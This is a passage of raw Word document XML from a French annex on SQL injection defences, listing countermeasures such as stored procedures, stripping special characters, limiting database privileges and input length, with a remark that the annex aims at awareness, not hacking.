        <w:t>d’autres fonctions qui dépend du type des données à vérifiés</w:t>
      </w:r>
      <w:r w:rsidR="001D60F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> avant de les passées dans les requêtes SQL</w:t>
      </w:r>
      <w:r w:rsidR="00E863A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="006823F6" w:rsidRDefault="005178EB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ind w:left="567" w:hanging="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Utiliser </w:t>
      </w:r>
      <w:r w:rsidRPr="006823F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>s procédures</w:t>
      </w:r>
      <w:r w:rsidRPr="006823F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> stockées</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="006823F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DA5F45" w:rsidP="003E3BEB">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284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DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les pr</w:t>
      </w:r>
      <w:r w:rsidR="00FA6495">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">océdures stockées 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>év</w:t>
      </w:r>
      <w:r w:rsidR="00FA6495">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">itent l'accès direct à la table celles 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 xml:space="preserve">qui ne sont pas </w:t>
      </w:r>
      <w:r w:rsidR="00FA6495">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>utilisées doi</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>vent être supprimées</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB7D18" w:rsidRPr="007A574C" w:rsidRDefault="00CC2614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ind w:left="567" w:hanging="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Enlever</w:t>
      </w:r>
      <w:r w:rsidR="00907E63">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> les caractères comme les slashs</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="007A574C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A75FAC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>back slashs et NULL dans toutes entrée utilisateur et des</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="007A574C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> paramètres de l'URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00FB7D18" w:rsidRDefault="00635405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ind w:left="567" w:hanging="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00FB7D18">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>es privilèges du compte d'utilisateur utilisé dans l'application pour exécuter des commandes SQL sur la base de données doivent être définis</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00FB7D18">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00FB7D18" w:rsidRDefault="00DA5F45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ind w:left="567" w:hanging="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D18">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La longueur de l'entrée d'utilisateur devrait être limitée</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="003D7008" w:rsidRDefault="00872F0B" w:rsidP="003D7008">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Il faut rejeter autant que possible </w:t>
      </w:r>
      <w:r w:rsidR="00B939C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">les entrées qui contiennent </w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00FB7D18">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>les caractères potentiellement dangereux</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00FB7D18">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00674536" w:rsidRPr="00312435" w:rsidRDefault="008837D0" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/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</w:pPr>
      <w:r w:rsidRPr="00312435">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Remarque:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1EB7" w:rsidRPr="0038563D" w:rsidRDefault="0038563D" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038563D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Cette annexe n’</w:t>
      </w:r>
      <w:r w:rsidR="00E508A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>est pas pour</w:t>
      </w:r>
      <w:r w:rsidRPr="0038563D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 vous apprendre le piratage</w:t>
      </w:r>
      <w:r w:rsidR="00B42E36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, elle est faite pour vous rendre plus conscient  de ce qu’un intrus peut faire </w:t>
      </w:r>
      <w:r w:rsidR="00434510">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">et des conséquences de l’exploitation d’une telle attaque, que ce soit son impact sur les données (porter atteinte à la confidentialité l’intégrité et </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidR="00434510">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>la disponibilité) ou sur l’entreprise.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00FC1EB7" w:rsidRPr="0038563D" w:rsidSect="005246CF">
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="default" r:id="rId18"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1418" w:right="1134" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
      <w:pgNumType w:start="83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2560" w:rsidRDefault="00682560" w:rsidP="00BA3143">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00682560" w:rsidRDefault="00682560" w:rsidP="00BA31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-70849207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62AA5" w:rsidRDefault="001F61F8">
        <w:pPr>
          <w:pStyle w:val="Pieddepage"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00362AA5">
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="0024453C">
          <w:rPr>
            <w:noProof/>
            <w:rtl/>
          </w:rPr>
          <w:t>92</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="003E3BEB" w:rsidRDefault="003E3BEB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2560" w:rsidRDefault="00682560" w:rsidP="00BA3143">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00682560" w:rsidRDefault="00682560" w:rsidP="00BA31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41D9" w:rsidRPr="00C369BB" w:rsidRDefault="001F61F8" w:rsidP="005A41D9">
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:bidi w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:lang w:val="fr-FR"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="001F61F8">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/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Connecteur droit avec flèche 15" o:spid="_x0000_s2049" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:-4.2pt;margin-top:16.95pt;width:458.2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M1nMQIAAFEEAAAOAAAAZHJzL2Uyb0RvYy54bWysVMGO2jAQvVfqP1i5QwgFFiLCqkqgl22L&#10;tNsPMLZDrDoeyzYEVPV/+h/9sY4NQWx7qarm4IwznjdvZp6zfDy1ihyFdRJ0kWTDUUKEZsCl3hfJ&#10;l5fNYJ4Q56nmVIEWRXIWLnlcvX2z7EwuxtCA4sISBNEu70yRNN6bPE0da0RL3RCM0OiswbbU49bu&#10;U25ph+itSsej0SztwHJjgQnn8Gt1cSariF/XgvnPde2EJ6pIkJuPq43rLqzpaknzvaWmkexKg/4D&#10;i5ZKjUlvUBX1lBys/AOqlcyCg9oPGbQp1LVkItaA1WSj36p5bqgRsRZsjjO3Nrn/B8s+HbeWSI6z&#10;myZE0xZnVILW2DhxsIRbkJ7Qo2CkVj9/4FQInsOmdcblGFvqrQ1ls5N+Nk/AvjqioWyo3otI/uVs&#10;EDALEemrkLBxBlPvuo/A8Qw9eIgdPNW2DZDYG3KKgzrfBiVOnjD8OJ1ni4cHJMx6X0rzPtBY5z8I&#10;aEkwisR5S+W+8deqwGYxDT0+OR9o0bwPCFk1bKRSURVKk65IFtPxNAY4UJIHZzjm7H5XKkuONOgq&#10;PrFG9Nwfs3DQPII1gvL11fZUqouNyZUOeFgY0rlaF+F8W4wW6/l6PhlMxrP1YDKqqsH7TTkZzDbZ&#10;w7R6V5VllX0P1LJJ3kjOhQ7sehFnk78TyfU6XeR3k/GtDelr9NgvJNu/I+k42TDMiyx2wM9b208c&#10;dRsPX+9YuBj3e7Tv/wSrXwAAAP//AwBQSwMEFAAGAAgAAAAhAClu+xzdAAAACAEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SFxQa6cFlIQ4VYXEgSNtJa7beEkC8TqKnSb06zHiQI+z&#10;M5p5W2xm24kTDb51rCFZKhDElTMt1xoO+5dFCsIHZIOdY9LwTR425fVVgblxE7/RaRdqEUvY56ih&#10;CaHPpfRVQxb90vXE0ftwg8UQ5VBLM+AUy20nV0o9Sostx4UGe3puqPrajVYD+fEhUdvM1ofX83T3&#10;vjp/Tv1e69ubefsEItAc/sPwix/RoYxMRzey8aLTsEjvY1LDep2BiH6m0gTE8e8gy0JePlD+AAAA&#10;//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVu&#10;dF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEA&#10;AF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFdkzWcxAgAAUQQAAA4AAAAAAAAAAAAAAAAALgIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAClu+xzdAAAACAEAAA8AAAAAAAAAAAAAAAAA&#10;iwQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACVBQAAAAA=&#10;"/>
      </w:pict>
    </w:r>
    <w:r w:rsidR="005A41D9">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:noProof/>
      </w:rPr>
      <w:t>Annexe</w:t>
    </w:r>
    <w:r w:rsidR="005A41D9" w:rsidRPr="00C369BB">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:lang w:val="fr-FR"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00205A75">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:lang w:val="fr-FR"/>
      </w:rPr>
      <w:t xml:space="preserve"> 1</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00BA3143" w:rsidRDefault="00BA3143" w:rsidP="005A41D9">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4320"/>
        <w:tab w:val="clear" w:pos="8640"/>
        <w:tab w:val="left" w:pos="7136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57467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D113DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CD6FD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0BAC6C8D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F7B0BC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26584FD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0D7DE2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BF07E14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A64C55A2"/>
    <w:lvl w:ilvl="0" w:tplc="81E009F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98020C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BC9048E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4196B90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3BA3B3C"/>
    <w:lvl w:ilvl="0" w:tplc="63A40F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83410D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0DA41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987297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ED83654"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AACE1AAC"/>
    <w:lvl w:ilvl="0" w:tplc="040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435B381F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69A45C8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34F4546"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0B0C7FE"/>
    <w:lvl w:ilvl="0" w:tplc="0409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5">
    <w:nsid w:val="5350709D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29FACB8E"/>
    <w:lvl w:ilvl="0" w:tplc="2E32A80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D652DDF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="027A7DD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F522867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2A87FDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5A2138E"/>
    <w:lvl w:ilvl="0" w:tplc="7C14A16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6FA4D7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0076E54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87A5523"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53568424"/>
    <w:lvl w:ilvl="0" w:tplc="01E29544">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1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CED17C2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EEE6D09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC9E5BE4"/>
    <w:lvl w:ilvl="0" w:tplc="AE56BE6E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FD22592"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E34FC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E9C7570"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0D0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9"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="25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2"/>
      <o:rules v:ext="edit">
        <o:r id="V:Rule1" type="connector" idref="#Connecteur droit avec flèche 15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BA3143"/>
    <w:rsid w:val="00003131"/>
    <w:rsid w:val="0001227D"/>
    <w:rsid w:val="00013C5A"/>
    <w:rsid w:val="00013ED6"/>
    <w:rsid w:val="00013EE0"/>
    <w:rsid w:val="00026AA2"/>
    <w:rsid w:val="00031169"/>
    <w:rsid w:val="00047222"/>
    <w:rsid w:val="0005296C"/>
    <w:rsid w:val="00057EC1"/>
    <w:rsid w:val="00061218"/>
    <w:rsid w:val="0006399D"/>
    <w:rsid w:val="00065065"/>
    <w:rsid w:val="00072063"/>
    <w:rsid w:val="00074D7C"/>
    <w:rsid w:val="00077F53"/>
    <w:rsid w:val="00080CF2"/>
    <w:rsid w:val="0009702D"/>
    <w:rsid w:val="000A36BE"/>
    <w:rsid w:val="000A514D"/>
    <w:rsid w:val="000A5359"/>
    <w:rsid w:val="000A6913"/>
    <w:rsid w:val="000A6BD6"/>
    <w:rsid w:val="000C3A49"/>
    <w:rsid w:val="000D1182"/>
    <w:rsid w:val="000E148B"/>
    <w:rsid w:val="000E18B7"/>
    <w:rsid w:val="000E1B59"/>
    <w:rsid w:val="000F10A6"/>
    <w:rsid w:val="00100100"/>
    <w:rsid w:val="00101F83"/>
    <w:rsid w:val="00106E27"/>
    <w:rsid w:val="00111578"/>
    <w:rsid w:val="001129D6"/>
    <w:rsid w:val="00123F9E"/>
    <w:rsid w:val="001325DB"/>
    <w:rsid w:val="00142C7E"/>
    <w:rsid w:val="0014535D"/>
    <w:rsid w:val="001504AF"/>
    <w:rsid w:val="00154266"/>
    <w:rsid w:val="00154F69"/>
    <w:rsid w:val="00156252"/>
    <w:rsid w:val="00156B31"/>
    <w:rsid w:val="00160B78"/>
    <w:rsid w:val="0016447D"/>
    <w:rsid w:val="00164BBC"/>
    <w:rsid w:val="00174EC9"/>
    <w:rsid w:val="00180011"/>
    <w:rsid w:val="00185AA2"/>
    <w:rsid w:val="00193C20"/>
    <w:rsid w:val="001A1189"/>
    <w:rsid w:val="001A1E63"/>
    <w:rsid w:val="001B361D"/>
    <w:rsid w:val="001C3E42"/>
    <w:rsid w:val="001C6414"/>
    <w:rsid w:val="001C71C3"/>
    <w:rsid w:val="001D15AE"/>
    <w:rsid w:val="001D326B"/>
    <w:rsid w:val="001D394F"/>
    <w:rsid w:val="001D60F9"/>
    <w:rsid w:val="001D660A"/>
    <w:rsid w:val="001E6F2D"/>
    <w:rsid w:val="001F09E8"/>
    <w:rsid w:val="001F595E"/>
    <w:rsid w:val="001F61F8"/>
    <w:rsid w:val="001F6DEC"/>
    <w:rsid w:val="00200BCB"/>
    <w:rsid w:val="002015B4"/>
    <w:rsid w:val="0020587C"/>
    <w:rsid w:val="00205A75"/>
    <w:rsid w:val="0021129A"/>
    <w:rsid w:val="0021140F"/>
    <w:rsid w:val="00211BF7"/>
    <w:rsid w:val="0021699F"/>
    <w:rsid w:val="00226607"/>
    <w:rsid w:val="00234139"/>
    <w:rsid w:val="00242FF9"/>
